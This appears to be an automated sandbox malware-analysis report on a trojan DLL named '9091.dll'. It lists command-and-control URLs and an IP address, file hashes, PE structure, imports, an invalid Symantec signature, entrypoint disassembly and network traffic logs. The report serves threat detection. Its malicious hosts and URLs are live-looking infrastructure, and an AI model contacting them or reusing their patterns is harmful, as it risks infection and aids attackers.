                        kdsjdsadas.online
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://firsone1.online/jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mkitrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://firsone1.online/jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mkitrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://google.mail.com/jkloll/SrOhqn0MT2IAkG_2B4u/QUT97q1sQV0r5x6X8tk4tl/QK7oXiqO2sMkr/Uet1eMX4/DBdloaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpfalse
                            		high
                            http://www.symantec.com9091.dllfalse
                              		high
                              https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bkloaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5loaddll32.exe, 00000000.00000003.484055973.0000000000ADA000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://kdsjdsadas.online/loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              134.0.117.195
                              		firsone1.onlineRussian Federation
                              		197695AS-REGRUtrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:548724
                              Start date:06.01.2022
                              Start time:11:50:07
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 41s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:9091.dll
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:30
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDLL@9/0@16/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 66.1% (good quality ratio 62.8%)
                              • Quality average: 80%
                              • Quality standard deviation: 28.6%
                              HCA Information:
                              • Successful, ratio: 63%
                              • Number of executed functions: 123
                              • Number of non-executed functions: 117
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .dll
                              • Override analysis time to 240s for rundll32
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              11:50:58API Interceptor1x Sleep call for process: regsvr32.exe modified
                              11:50:58API Interceptor2x Sleep call for process: rundll32.exe modified
                              11:51:00API Interceptor1x Sleep call for process: loaddll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              AS-REGRU3A6CA6A75525505890DC5D13AB3D888135B1CB4922605.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              00B5C410D204D6A92F6636E23998777D2716E8928F96B.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              ACAs6Kprey.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              VmIzagkjCN.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              3AXhCF0wwC.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              VjZ2RqGBHw.exeGet hashmaliciousBrowse
                              • 194.87.185.135
                              Hc4KII1iA8.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              02074f3606117bb4d18da7796c4866a746ed3eaeb2ffa.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              5508b2b109b759359ba8fb16563b3eab549c1a2e39984.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              vWSlt1VcxW.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              vI2FA978aV.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              HpFJGpPUfD.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              45HwRuIsfe.exeGet hashmaliciousBrowse
                              • 194.87.185.125
                              G4aYlYk5Vp.exeGet hashmaliciousBrowse
                              • 194.87.185.135
                              7WQadnF0l1.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              28043B9D96A6D54044950BCA23633AB601DCFDBE4305B.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              nUkbOfIFrC.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              WhCaRe7XsR.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              eiqhremk1t.exeGet hashmaliciousBrowse
                              • 91.224.22.193
                              8TDgYQyI5F.exeGet hashmaliciousBrowse
                              • 91.224.22.193

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              37f463bf4616ecd445d4a1937da06e19content-1.dotmGet hashmaliciousBrowse
                              • 134.0.117.195
                              cC1Ah2Rb6v.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              IcB2dEV7s3.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              ZoUkhFNM2x.dllGet hashmaliciousBrowse
                              • 134.0.117.195
                              z745hbus8A.dllGet hashmaliciousBrowse
                              • 134.0.117.195
                              fW1PcUI2uF.dllGet hashmaliciousBrowse
                              • 134.0.117.195
                              content-1.dotmGet hashmaliciousBrowse
                              • 134.0.117.195
                              Verlyqyxssaxyfkseckzhdsdepwirsjjoa.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              BACS betaling from Chr Pedersens Tegnestue.xlsxGet hashmaliciousBrowse
                              • 134.0.117.195
                              4BAEF09AFA940E86CDB9651C83BB40B87674E507E5C4E.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              adguardinstaller.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              7zJwsSgHYP.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              0BFJSiSdej.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              ABxSa33mul.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              hK9HRT2Nc0.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              ABxSa33mul.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              YLgzPnCVZX.docxGet hashmaliciousBrowse
                              • 134.0.117.195
                              Statment Payment Request.xlsxGet hashmaliciousBrowse
                              • 134.0.117.195
                              RFQ FOR 2022 NEW ORDER.exeGet hashmaliciousBrowse
                              • 134.0.117.195
                              Oxpxvknymqvpksgmqwnmrzbidwmldqvaaq.exeGet hashmaliciousBrowse
                              • 134.0.117.195

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:MS-DOS executable, MZ for MS-DOS
                              Entropy (8bit):6.176894617561241
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • VXD Driver (31/22) 0.00%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:9091.dll
                              File size:814960
                              MD5:8cef4bb6ea32fc461e3a954500413512
                              SHA1:d0612a06f724ebdb72db009010207c929aac9007
                              SHA256:6a455667f74c818d5e20a83af8ba5eb8022b1714ceb9302c2b7f7f4ea1a141c9
                              SHA512:643bddbb9dfe6f1a3ffbb3966633139e16311c61d2ae3d4434410dea484b49520d6f6830e008d119e9da0dffc50d603aa022fc93f4ecfa2e4cbc7f3a31a88170
                              SSDEEP:12288:0ndQdX/AMsv/4xivLv3nt+pjL9xLd5pbafXcEgP5tVLYA:0nd+XTsX4xeLVkf9D/OfMpP5tVLr
                              File Content Preview:MZ......................................................................!..L.!This program cannot be run in :NS#mode....$.......PE..L...Y..a...........!.........$...&...................................................s...............................#..S..

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x1000d5a5
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x10000000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x6182C359 [Wed Nov 3 17:14:01 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:75c5d658b9f8b84d2af03b825d82cf97

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                              Signature Validation Error:The digital signature of the object did not verify
                              Error Number:-2146869232
                              Not Before, Not After
                              • 10/30/2007 5:00:00 PM 11/24/2010 3:59:59 PM
                              Subject Chain
                              • CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
                              Version:3
                              Thumbprint MD5:773A103A1953B292916AAA8D3382140B
                              Thumbprint SHA-1:508E846523E1B131438B220694BE91793886508E
                              Thumbprint SHA-256:F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
                              Serial:758F5EE8263B6694719D8434EB998608

                              Entrypoint Preview

                              Instruction
                              sub edx, 00080614h
                              xor edx, edx
                              xor ecx, ecx
                              push ecx
                              call dword ptr [1001D1F4h]
                              or eax, eax
                              je 00007FAD2CC1A223h
                              ret
                              xor eax, eax
                              jmp 00007FAD2CC16247h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              mov ecx, dword ptr [ebp+08h]
                              call 00007FAD2CC19472h
                              mov ecx, dword ptr [edx-04h]
                              add ecx, eax
                              ret
                              mov dword ptr [004222ACh], 00416B00h
                              jmp 00007FAD2CC0C48Ah
                              call 00007FAD2CC1A4A1h
                              pop ebx
                              lea ecx, dword ptr [ebp-00000430h]
                              mov ecx, dword ptr [edx-08h]
                              int3
                              int3
                              int3
                              int3
                              lea ecx, dword ptr [ebp-01h]
                              int3
                              lea ecx, dword ptr [ebp-2Ch]
                              dec dword ptr [ebp+10h]
                              call 00007FAD2CC19406h
                              mov dword ptr [00422A34h], eax
                              push 0000006Ah
                              push 00000001h
                              call dword ptr [1001D2A8h]
                              mov dword ptr [ebp+08h], eax
                              cmp eax, 00000000h
                              jne 00007FAD2CC0FA5Eh
                              push dword ptr [100DED98h]
                              push dword ptr [ebp+08h]
                              push dword ptr [100DEA55h]
                              push eax
                              push 100053D4h
                              ret
                              hlt
                              hlt
                              hlt
                              hlt
                              hlt
                              mov ecx, dword ptr [ebp-10h]
                              int3
                              int3
                              jmp 00007FAD2CC0C3ADh
                              mov dword ptr [ebp+08h], eax
                              cmp eax, 00000000h
                              jne 00007FAD2CC0F0F6h
                              push 00000021h
                              push dword ptr [100DDC72h]

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x123b40x53.text
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1233c0x78.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe70000x264.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0xc5a000x1570.data
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe80000x1874.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x1d1b80x1b8.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x1206a0x12200False0.483876616379data6.17524441599IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .arthros0x140000x81e30x200False0.115234375data0.694481329226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rdata0x1d0000xb5a0xc00False0.430989583333data5.17974431027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .preter0x1e0000x3a9080x32800False0.458684637995COM executable for DOS5.79983555937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .witched0x590000x38fff0x31000False0.458665497449data5.79587852109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .restitu0x920000x3243e0x32600False0.458339795285data5.7997141046IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              .data0xc50000x21f940x19e00False0.609478789251data5.91710883704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0xe70000x2640x400False0.31640625data2.11462066039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xe80000x18740x1a00False0.778846153846data6.61132299142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_VERSION0xe70580x20cdataEnglishUnited States

                              Imports

                              DLLImport
                              advapi32.dllGetTokenInformation, SetSecurityDescriptorDacl, SetTokenInformation, RegDeleteValueW, InitializeSecurityDescriptor, RegOpenKeyExW, RevertToSelf, OpenProcessToken
                              kernel32.dllSetConsoleCtrlHandler, DeleteCriticalSection, ReadFile, LockResource, GetTempPathW, CancelWaitableTimer, LoadLibraryA, RaiseException, QueryPerformanceCounter, OutputDebugStringW, EnterCriticalSection, SizeofResource, HeapFree, WaitForMultipleObjects, UnmapViewOfFile, LoadLibraryW, ResetEvent, WaitForSingleObject, GetLastError, SetWaitableTimer, VirtualProtect, OpenFileMappingW, CopyFileW, GetCurrentProcessId, GetProcessHeap, GetModuleFileNameW, CreateFileMappingW, HeapAlloc, FlushFileBuffers, CreateNamedPipeW, GetCommandLineW, DeleteFileW, FindFirstFileW, FindNextFileW, InitializeCriticalSectionAndSpinCount, DisconnectNamedPipe, MultiByteToWideChar, GetSystemInfo, CloseHandle, GetComputerNameExW, GetModuleFileNameA, InterlockedExchange, LeaveCriticalSection, FreeLibrary, GetTickCount, GetFileSize, FindResourceExW, ConnectNamedPipe, HeapSize, TerminateThread, CreateMutexW, DeviceIoControl, CreateThread, IsDebuggerPresent, GetOverlappedResult, ExpandEnvironmentStringsW, IsProcessorFeaturePresent, CancelIo, GetDateFormatW, HeapDestroy, GetModuleHandleW, FindClose, ReleaseMutex, WaitForMultipleObjectsEx, CreateEventW, FindResourceW, GetCurrentThreadId, WideCharToMultiByte, CreateFileW, GetCurrentProcess, MapViewOfFile, CreateWaitableTimerW, LoadResource, InitializeCriticalSection, GetTimeFormatW, SetEvent, GetTimeZoneInformation, Sleep, GetShortPathNameW, HeapReAlloc
                              mpr.dllWNetGetUniversalNameW
                              ole32.dllCoUninitialize, CoInitialize
                              user32.dllEnumThreadWindows, SendMessageW, LoadStringW, MsgWaitForMultipleObjects, SetTimer, wsprintfW, PostThreadMessageW, GetParent, LoadIconA, DispatchMessageW, GetIconInfo, TranslateMessage, IsWindow, KillTimer

                              Exports

                              NameOrdinalAddress
                              DllRegisterServer10x100072b9

                              Version Infos

                              DescriptionData
                              InternalNameBavius
                              FileVersion3, 2, 8, 9
                              CompanyNamePRomT
                              FileDescriptionSuberitidae
                              CommentsUnannex
                              PrivateBuildPhilomel
                              Translation0x0409 0x04e4

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 6, 2022 11:52:32.174588919 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:32.174628019 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:32.174720049 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:32.203892946 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:32.203943014 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:32.686209917 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:32.686376095 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.031618118 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.031644106 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:33.032174110 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:33.032252073 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.035207033 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.076894999 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:33.089039087 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:33.089149952 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.089168072 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:33.089229107 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:33.089257002 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.089320898 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.115183115 CET49803443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:33.115212917 CET44349803134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.532129049 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.532176018 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.532263994 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.552927971 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.552970886 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.659080029 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.659240961 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.930315971 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.930375099 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.930928946 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.931008101 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.933533907 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.976949930 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.985939980 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.986087084 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.986095905 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:34.986418009 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.994661093 CET49811443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:34.994695902 CET44349811134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.243355989 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.243410110 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.243504047 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.267493963 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.267524004 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.385811090 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.385900974 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.617567062 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.617597103 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.618083954 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.618185997 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.620836973 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.660917044 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.678560972 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.678662062 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.678683043 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:35.678787947 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.688746929 CET49812443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:35.688785076 CET44349812134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.232381105 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.232429028 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.232552052 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.271809101 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.271845102 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.384601116 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.384757042 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.662944078 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.662972927 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.663539886 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.663598061 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.666419983 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.708877087 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719192028 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719260931 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.719290972 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719338894 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.719352961 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719398975 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.719773054 CET44349813134.0.117.195192.168.2.3
                              Jan 6, 2022 11:52:39.719827890 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.727421999 CET49813443192.168.2.3134.0.117.195
                              Jan 6, 2022 11:52:39.727447987 CET44349813134.0.117.195192.168.2.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 6, 2022 11:51:11.877147913 CET5600953192.168.2.38.8.8.8
                              Jan 6, 2022 11:51:11.899928093 CET53560098.8.8.8192.168.2.3
                              Jan 6, 2022 11:51:14.235074043 CET5902653192.168.2.38.8.8.8
                              Jan 6, 2022 11:51:14.255937099 CET53590268.8.8.8192.168.2.3
                              Jan 6, 2022 11:51:14.977771997 CET4957253192.168.2.38.8.8.8
                              Jan 6, 2022 11:51:15.000612974 CET53495728.8.8.8192.168.2.3
                              Jan 6, 2022 11:51:18.989257097 CET5213053192.168.2.38.8.8.8
                              Jan 6, 2022 11:51:19.008183002 CET53521308.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:32.089071035 CET5510853192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:32.159209967 CET53551088.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:34.447751045 CET5894253192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:34.516730070 CET53589428.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:35.159759045 CET6443253192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:35.227482080 CET53644328.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:39.175417900 CET4925053192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:39.194324017 CET53492508.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:53.208827972 CET6112053192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:53.233433962 CET53611208.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:55.117465973 CET5307953192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:55.136367083 CET53530798.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:55.785442114 CET5082453192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:55.804541111 CET53508248.8.8.8192.168.2.3
                              Jan 6, 2022 11:52:59.872992992 CET5356953192.168.2.38.8.8.8
                              Jan 6, 2022 11:52:59.894037962 CET53535698.8.8.8192.168.2.3
                              Jan 6, 2022 11:54:13.779227018 CET4929053192.168.2.38.8.8.8
                              Jan 6, 2022 11:54:13.795664072 CET53492908.8.8.8192.168.2.3
                              Jan 6, 2022 11:54:15.196199894 CET5975453192.168.2.38.8.8.8
                              Jan 6, 2022 11:54:15.220105886 CET53597548.8.8.8192.168.2.3
                              Jan 6, 2022 11:54:15.862837076 CET4923453192.168.2.38.8.8.8
                              Jan 6, 2022 11:54:15.886075020 CET53492348.8.8.8192.168.2.3
                              Jan 6, 2022 11:54:19.977394104 CET5744753192.168.2.38.8.8.8
                              Jan 6, 2022 11:54:19.998173952 CET53574478.8.8.8192.168.2.3

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Jan 6, 2022 11:51:11.877147913 CET192.168.2.38.8.8.80x2428Standard query (0)google.mail.comA (IP address)IN (0x0001)
                              Jan 6, 2022 11:51:14.235074043 CET192.168.2.38.8.8.80x1708Standard query (0)google.mail.comA (IP address)IN (0x0001)
                              Jan 6, 2022 11:51:14.977771997 CET192.168.2.38.8.8.80x5506Standard query (0)google.mail.comA (IP address)IN (0x0001)
                              Jan 6, 2022 11:51:18.989257097 CET192.168.2.38.8.8.80xb3aStandard query (0)google.mail.comA (IP address)IN (0x0001)
